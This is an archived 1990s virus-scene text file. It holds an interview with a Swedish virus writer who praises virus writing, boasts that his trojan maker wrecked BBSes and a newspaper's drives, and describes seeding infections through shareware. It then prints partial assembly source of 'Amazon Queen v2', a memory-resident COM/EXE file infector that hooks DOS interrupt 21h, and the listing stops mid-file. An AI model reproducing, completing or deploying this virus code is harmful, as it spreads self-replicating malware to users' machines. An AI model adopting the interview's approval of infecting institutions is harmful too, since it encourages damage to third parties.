💾 Archived View for spam.works › mirrors › textfiles › virus › lzinterv.iew captured on 2023-06-16 at 21:03:24.
-=-=-=-=-=-=-
Here's a short interview with yet another swedish viruswriter,
Lord Zero. One of his very old source-code follow this crappy
interview wipped up in a few minutes it looks like :-).
Lord Zer0 is the writer of Trojan Horse Maker, which never worked
on my machine, but might work on some :-), and of viruses like
Swedish_Warrior (included in IR#4) and others.
I wish him good luck in the future and thank him for being swedish
and writing viruses :-).
- The Unforgiven.
================================================================================
TU> = The Unforgiven
LZ> = Lord Zer0
TU> Give me a short description of who you are?
LZ> - My name is Alexander Augustus Napoleon...
TU> From where did you get you handle, Lord Zer0?
LZ> - From my brain...hehe
TU> Does your handle has some specific meaning?
LZ> - Sure, It means "The LoRD over all the Zer0s"
TU> When did you discovered the world of computers?
LZ> - When I was ten and my daddy brought home a PC from his office.
TU> How long have you been active in the scene?
LZ> - Since summer '93.
TU> Why did you start to call boards and such things?
LZ> - " Fame is our greatest enemy. "
TU> How did you came into the virus business?
LZ> - I got a copy of "The little black book of virus" by Mark Ludwig
and started experimenting with the "Timid" virus.
TU> Why did you start to write viruses?
LZ> - I've always liked to create things and if I could manage to create
"living" things that's exactly what I want to do.
TU> Which goals do you have as a viruswriter?
LZ> - Well, one of my goals is to finish "C.I.V", "Computer Immune
Virus" (EXE, WIN, MBR, maybe OS/2, Polymorphic(Gen_X), Stealth and
a lots of Anti-AV.)
TU> What programming-languages are you familiar with, and what's your
favourite language?
LZ> - I am familiar with Visual Basic, C, Quick Basic and Assembler.
Assembler is outstanding.
TU> You wrote a trojan-horse maker some while back, is that now finished
project or have you plans to continue on it?
LZ> - It's finished. The last version is 1.52.
TU> Which responses have you had about it?
LZ> - Well, I heard that it was spread like wildfire, many BBS's was
fucked up, and there was a war in Finland. DN (the largest Swedish
daily paper) got their Harddrives fuck-up.
(L.o.C. also got blacklisted on Internet and stuff like that, so
they had to change their name.)
TU> Do you have any plans to write a virus-code generator?
LZ> - Yes, I have one, which is nearly finished. (When I had the routine
creating the infected files left to write I got tired but I'll probably
finish it, one day, so stay alert.;) )
TU> Do you release viruses/trojans into public?
LZ> - Of course not! ;) Actually, there are already too many of them out
there, so a few of my NORMAL creations won't make any difference.
No phun! The viruses which are released must include some new ideas
or be very wide spead, to make someone notice them.
TU> How many viruses has you written?
LZ> - Ten maybe twenty, I don't really know(or care).
TU> How do you name your viruses?
LZ> - Well, in many different ways. I won't tell you..(I will require at
least half a page.)
TU> What motivates you to write viruses?
LZ> - You would never ask an artist: "Why do you paint ?"
TU> Do you think you will continue to write viruses?
LZ> - Yes, I will. Today, I can't see the end.
TU> Would you feel guilty if one of your viruses made damage to a
hospital?
LZ> - All my viruses are non-destructive. So don't blame me.
(And use my software at your own risk...hehe.)
TU> Would you deliberate infect a school or government institution if you
know they would replicate well if you did so?
LZ> - Yes, I think. If it could spread outside the institution. (I will
not infect a close system.)
TU> Do you find it easier to infect pirated software (which is illegal to
use), than PD/SW software?
LZ> - No, if I choose to infect a pirated software, I have to get
something very new if I want many users to get infected. That's the
big problem, and besides, elite users knows more about viruses than
PD/SW people do. So if I'd try to spread a virus, I'd prefer to put
it in a PD/SW.
TU> Do you encourage deliberate destructive code in viruses?
LZ> - No. (I wouldn't want to get my HD overwritten, and I think nobody
likes that.)
TU> Have you considered writing destructive code in viruses?
LZ> - No, the highest goal of a virus is survival, so why then commit
suicide, with trashing the HD?
TU> What to you think of the issue concerning 'undestructive-viruses'?
LZ> - I don't agree to it... A virus should be undestructive..
That's my opinion.
TU> Do you think one can make a virus beneficial?
LZ> - Sure, but then the "virus" is spelled: S O F T W A R E
TU> Have you ever considered writing a GOOD virus?
LZ> - Nope,...How can a virus be GOOD ?
TU> Bontchev described in his 'write-up' "Is good Computer-Viruses still
a bad idea", do you think one of those viruses can be classified
good?
LZ> - A virus, which search/watch for something or update a software,
may be a beneficial virus.
TU> Do you have any more arguments why viruses can't be beneficial than
the one Bontchev mentioned in his article?
LZ> - My arguments won't make anything different. There're too many
problems to solve, and one or two more won't matter.
TU> If you think its possible to write a good virus, how to solve the
above problems?
LZ> - Ask God ;)
TU> About virus-code-generators, what is your opinion about them, and
about people using them thinking they are hot-shot-eleete?
LZ> - It's a good idea, but it's rather useless. I my opinion people
using code-generators are lame or stupid. (They want to make a
virus but can't or are too lame to write one..BaH!)
LZ> Do you write viruses to get recognition in the virus/AV community?
LZ> - No. I just write viruses, because I think it's fun.
TU> What do you think about the media/AV describing viruswriters as
lonely individuals with no life?
LZ> - A person who can always do exactly what he wants without having to
care about what people think has a FREE life.
And about friends; I've got plenty of friends, friends who know
things about myself and my virustechnique that I've only told them
because I can trust them. For example the guys reading through
this interview, my press staff...But... to the people who wants
the truth: Make up your own opinion!
TU> Do you think the scene is asocial or not?
LZ> - It depends on what you make of it, doesn't it?
TU> How are you in real life (in a private matter).
LZ> - A highly respectable young man, who loves life and doing good at
school, which means nothing.(It could be any boy/girl in sweden,
who cares about the school.)
TU> How do you make your living?
LZ> - Nothing, just spend my parents money.
TU> Have the scene/viruswriting influent you in real life?
LZ> - Yes a bit, but not much.
LZ> What do your parents/close friends thinks about your viruswriting?
LZ> - Some of my friends know that I write viruses, but they believe
that I won't spread my creations. I don't really know what my
parents know about my virus writing, but I suspect they know what
I'm doing and as long as I'm doing good at school, they won't care.
They probably think that it's just a "game", which will die out in a
couple of years.
TU> Are you into viruswriting only or other parts of the
computer-underground?
LZ> - I crack games, and programs. I'm an elite trader (Under
an other handle.)
===============================================================================
% Amazon Queen v2 by Lord Zer0 %
????????????????????????????????
Amazone Queen v2 is a memory resident infector of COM and EXE programs
executed, opened (both normal and extended), or touched with the
dos attrib-function, thus making this a pretty fast infector.
It 're-vectors' interrupt 21h (dos) to be interrupt38h, marks exe-files
with a '0' in the exe-header's negative checksum adress (12h - which
ofcourse is ignored) and a few other thing... and yeah, it can bug, and
there you go..
- The Unforgiven.
================================================================================
.model tiny
.code
org 100h
start:
push cs
pop ds
call begin
begin:
mov bx,sp
mov bp,ss:[bx]
sub bp,offset begin-100h
inc sp
inc sp
push es
inc [generation-100h+bp]
mov ah,0ACh
int 21h
cmp al,'0'
jnz go_tsr
cmp bx,cs:[_version+bp-100h]
jge return_file
mov ah,0AEh ; uninstall Virus
int 21h
mov ah,9 ; Give the user a notice that s/he has got
; at least two viruses on the HD...
lea dx,[bp+vx_name-100h]
int 21h
go_tsr:
xor ax,ax
mov es,ax
mov di,200h
mov si,bp
mov cx,vx_size/2
rep movsw
stosw
stosw
mov ds,cx
mov ax,offset int_21+100h
cli
xchg ds:[21h*4],ax
mov ds:[38h*4],ax
mov ds:[oldint21+100h],ax
xchg ds:[21h*4+2],cx
mov ds:[38h*4+2],cx
mov ds:[oldint21+102h],cx
sti
return_file:
pop es
push cs
pop ds
cmp sp,0FFFEh
je ret_com
push es
pop ds
mov ax,es
add ax,10h
add ax,word ptr cs:[bp+buffer+2-100h]
push ax
push word ptr cs:[bp+buffer-100h]
retf
buffer:
int 20h
db '00'
ret_com:
mov di,100h
dec sp
dec sp
mov bx,sp
mov [bx],di
lea si,[bp+buffer-100h]
movsw
movsw
xor ax,ax
retn
vx_name db ' Amazon Queen...v2.0